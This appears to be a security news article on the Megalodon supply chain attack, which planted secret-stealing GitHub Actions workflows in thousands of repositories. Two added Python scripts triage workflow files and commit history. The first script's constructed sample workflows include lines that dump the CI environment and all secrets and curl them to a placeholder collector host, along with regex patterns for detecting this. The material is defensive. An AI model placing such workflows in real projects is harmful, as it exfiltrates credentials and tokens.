Megalodon Supply Chain Attack Infects Over 5,500 GitHub Repositories
A recent supply chain attack, dubbed Megalodon, has infected over 5,500 GitHub repositories with malware, according to security researchers. The attack relies on automated commits to inject malicious workflows into the repositories.
The campaign uses GitHub Actions workflows containing a payload designed to steal credentials, keys, tokens, and other secrets. The workflows were injected through over 5,700 malicious commits pushed to the impacted repositories within a six-hour window on May 18.
Malicious Payloads and Backdoors
The attackers deployed two payloads. One added a new workflow that is triggered on every push and pull request; the other replaced existing workflows with versions bound to specific triggers, creating dormant backdoors.
On infected machines, the malware would exfiltrate all CI environment variables, AWS credentials, GCP access tokens, Azure credentials, SSH private keys, Docker and Kubernetes configurations, API keys, database connection strings, GitHub Actions tokens, GitLab CI/CD tokens, and dozens of other types of secrets.
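The two payload shapes described above leave recognisable traces in a workflow file: a workflow that fires on every push and pull request and dumps the CI environment, and a workflow_dispatch-only workflow that sits idle until invoked. The script below is an added triage example for this article, not code from the article, SafeDep, Ox Security or GitHub. The three workflow texts are constructed, the collector hostname is a placeholder, and the regexes are generic heuristics rather than indicators taken from the real campaign.

```python
"""Heuristic triage of GitHub Actions workflow files for the two payload
shapes described above: a workflow that fires on every push and pull
request and dumps the CI environment, and a workflow_dispatch-only workflow
that sits dormant until it is invoked through the API.

Added example for this article; not code from the article, SafeDep,
Ox Security or GitHub. The workflow texts are constructed, the collector
hostname is a placeholder, and the regexes are generic heuristics rather
than indicators taken from the real campaign."""
import re

# --- constructed sample workflows (not real campaign artifacts) -------------
BENIGN = """\
name: ci
on:
  push:
    branches: [main]
  pull_request:
jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: npm ci && npm test
"""

NOISY = """\
name: build
on: [push, pull_request]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - run: env > /tmp/e.txt
      - run: curl -s --data-binary @/tmp/e.txt https://collector.invalid/up
"""

DORMANT = """\
name: release
on:
  workflow_dispatch:
jobs:
  release:
    runs-on: ubuntu-latest
    env:
      ALL: ${{ toJSON(secrets) }}
    steps:
      - run: curl -s --data "$ALL" https://collector.invalid/up
"""

# Patterns that are rarely legitimate in a CI step: serialising the whole
# secrets/env context, dumping the shell environment, or posting data out.
SECRET_ACCESS = {
    "context-dump": re.compile(r"toJSON\(\s*(secrets|env)\s*\)"),
    "env-dump": re.compile(r"\b(env|printenv)\b[ \t]*(>|\|)"),
    "outbound-post": re.compile(r"\bcurl\b[^\n]*(--data|-d\b|--upload-file|-F\b)"),
}


def triggers(text):
    """Return the set of event names under the top-level `on:` key.

    Handles the three spellings GitHub accepts: `on: push`,
    `on: [push, pull_request]`, and the block form with one key (or list
    item) per line. Nested filters such as `branches:` are skipped."""
    lines = text.splitlines()
    found = set()
    for i, line in enumerate(lines):
        m = re.match(r"^(?:on|\"on\"|'on'):[ \t]*(.*)$", line)
        if not m:
            continue
        rest = m.group(1).strip()
        if rest.startswith("["):                       # flow list
            found.update(t.strip().strip("\"'") for t in rest.strip("[]").split(",") if t.strip())
        elif rest:                                     # single scalar
            found.add(rest.strip("\"'"))
        else:                                          # block form
            child_indent = None
            for nxt in lines[i + 1:]:
                stripped = nxt.strip()
                if not stripped or stripped.startswith("#"):
                    continue
                indent = len(nxt) - len(nxt.lstrip())
                if indent == 0:
                    break
                if child_indent is None:
                    child_indent = indent
                if indent == child_indent:
                    found.add(stripped.lstrip("- ").rstrip(":").strip("\"'"))
    return found


def assess(text):
    """Classify one workflow text against the two payload shapes."""
    trig = triggers(text)
    hits = sorted(name for name, pat in SECRET_ACCESS.items() if pat.search(text))
    findings = []
    if hits and {"push", "pull_request"} <= trig:
        findings.append("noisy: runs on every push/PR and exfiltrates the environment")
    if hits and trig == {"workflow_dispatch"}:
        findings.append("dormant: workflow_dispatch-only with secret access")
    return {"triggers": trig, "hits": hits, "findings": findings}


if __name__ == "__main__":
    for label, wf in (("benign", BENIGN), ("noisy", NOISY), ("dormant", DORMANT)):
        print(label, assess(wf))
```

Run it over every file under `.github/workflows/` in a checkout; a workflow that is `workflow_dispatch`-only and reads secrets deserves a look even when it has never run, because by design it produces no run history until someone calls it.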
Discovery and Investigation
Megalodon was discovered after malicious versions of the Tiledesk package, an open source live chat and chatbot platform, were identified. The infected packages were published between May 19 and May 21.
According to SafeDep, the same NPM account, eljohnny, published both the clean and compromised versions of the package. The attacker never touched the NPM account, but instead compromised the GitHub repository, and the maintainer published from the poisoned source without realizing it.
The malicious commit that led to the infection was pushed on May 18, authored by ‘build-bot’. SafeDep’s investigation into the associated email address uncovered a total of 2,878 commits made on the same day, along with an additional 2,841 commits made via a second email address.
Attack Vector and Impact
All 5,718 commits landed on the same day, May 18, 2026, within a six-hour window from approximately 11:36 to 17:48 UTC, targeting 5,561 distinct repositories. The attackers’ choice of trigger for the malicious GitHub Actions workflow, namely ‘workflow_dispatch’, meant the dormant backdoor could be fired at a later date via the GitHub API, using stolen GitHub tokens.
The workflow_dispatch event is exempt from GitHub’s anti-recursion rules, which normally prevent events triggered with a GitHub token from spawning new workflow runs. This allowed the attackers to retain access to the infected repositories even after the initial infection.
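The investigation pattern in the two sections above, a bot author pushing workflow changes inside a narrow window and pivoting across more than one committer e-mail address, can be reproduced against a single repository's history. The script below is an added example, not code from SafeDep or GitHub. The log text is constructed in the format produced by `git log --date=iso-strict --format='%H|%an|%ae|%ad' --name-only`; the hashes and e-mail addresses are placeholders, while the window (May 18, 2026, 11:36 to 17:48 UTC) and the author name ‘build-bot’ are the values the article reports.

```python
"""Commit-history triage: flag commits that changed a workflow file inside a
time window, and pivot on the e-mail addresses used under one author name.

Added example for this article, not code from SafeDep or GitHub. SAMPLE_LOG
is constructed in the shape of
  git log --date=iso-strict --format='%H|%an|%ae|%ad' --name-only
with placeholder hashes and addresses. The window and the author name
'build-bot' are the values given in the article."""
from collections import Counter
from datetime import datetime, timezone

WINDOW_START = datetime(2026, 5, 18, 11, 36, tzinfo=timezone.utc)
WINDOW_END = datetime(2026, 5, 18, 17, 48, tzinfo=timezone.utc)
WORKFLOW_DIR = ".github/workflows/"

# Constructed log output (not real commits).
SAMPLE_LOG = """\
aaaa111|build-bot|bot-a@example.invalid|2026-05-18T11:40:02+00:00

.github/workflows/build.yml

bbbb222|Jane Dev|jane@example.invalid|2026-05-18T12:05:44+00:00

src/app.js
package.json

cccc333|build-bot|bot-b@example.invalid|2026-05-18T17:30:10+00:00

.github/workflows/release.yml

dddd444|build-bot|bot-a@example.invalid|2026-05-20T09:00:00+00:00

README.md
"""


def parse_log(text):
    """Turn the pipe-delimited log into a list of commit dicts.

    A line with four pipe-separated fields starts a commit; every other
    non-blank line is a path changed by the most recent commit."""
    commits = []
    for line in text.splitlines():
        if not line.strip():
            continue
        parts = line.split("|")
        if len(parts) == 4:
            sha, name, email, date = parts
            commits.append({"sha": sha, "author": name, "email": email,
                            "when": datetime.fromisoformat(date), "files": []})
        elif commits:
            commits[-1]["files"].append(line.strip())
    return commits


def touches_workflows(commit):
    """True if the commit changed anything under .github/workflows/."""
    return any(f.startswith(WORKFLOW_DIR) for f in commit["files"])


def suspicious(commits, start=WINDOW_START, end=WINDOW_END):
    """Hashes of commits that changed a workflow file inside the window."""
    return [c["sha"] for c in commits
            if start <= c["when"] <= end and touches_workflows(c)]


def emails_for_author(commits, author):
    """Pivot: how many commits each e-mail address made under one author name."""
    return Counter(c["email"] for c in commits if c["author"] == author)


if __name__ == "__main__":
    history = parse_log(SAMPLE_LOG)
    print("workflow changes in window:", suspicious(history))
    print("addresses used by build-bot:", dict(emails_for_author(history, "build-bot")))
```

The window filter is deliberately applied to every author, not only ‘build-bot’: a display name is trivially chosen by whoever pushes, so the time-bounded change to a workflow file is the stronger signal, and the e-mail pivot is then used to widen the search rather than to narrow it.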
Response and Prevention
Last week, NPM announced that all NPM granular access tokens with write access that bypass two-factor authentication have been invalidated to prevent supply chain attacks similar to Mini Shai-Hulud. According to Ox Security, this should prevent account hijacking, but does not resolve the underlying problem, and malicious code will continue to spread through compromised repositories.
Ox Security notes that if platforms continue allowing any type of code to be uploaded without serious vetting, the number of attacks will only increase. The cybersecurity firm warns that we have entered a new supply chain attack era, and the Megalodon attack is just the beginning of an endless wave of cyber attacks on developers worldwide.
- Related: Grafana Says Codebase and Other Data Stolen via TanStack Supply Chain Attack
- Related: Supply Chain Security Crisis: Too Many Vulnerabilities, Too Little Visibility
- Related: Over 320 NPM Packages Hit by Fresh Mini Shai-Hulud Supply Chain Attack
- Related: OpenAI Hit by TanStack Supply Chain Attack
Source: SecurityWeek